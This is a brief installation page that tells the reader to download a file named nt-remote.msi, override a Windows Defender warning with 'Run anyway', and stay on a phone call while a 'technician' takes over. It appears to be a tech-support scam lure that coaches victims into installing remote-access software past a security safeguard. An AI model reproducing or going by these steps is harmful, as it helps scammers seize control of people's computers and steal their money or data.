Installation Instructions

   Download the File

   Click the green download button above to save nt-remote.msi to your computer.

   Run the Installer

   Double-click the downloaded file. If prompted by Windows Defender, click "More info" then "Run anyway".

   Follow Installation Wizard

   Click "Next" through the installation prompts and wait for the install to complete.

   Stay on the Phone

   Keep your phone call connected. Our technician will guide you through the rest of the process.
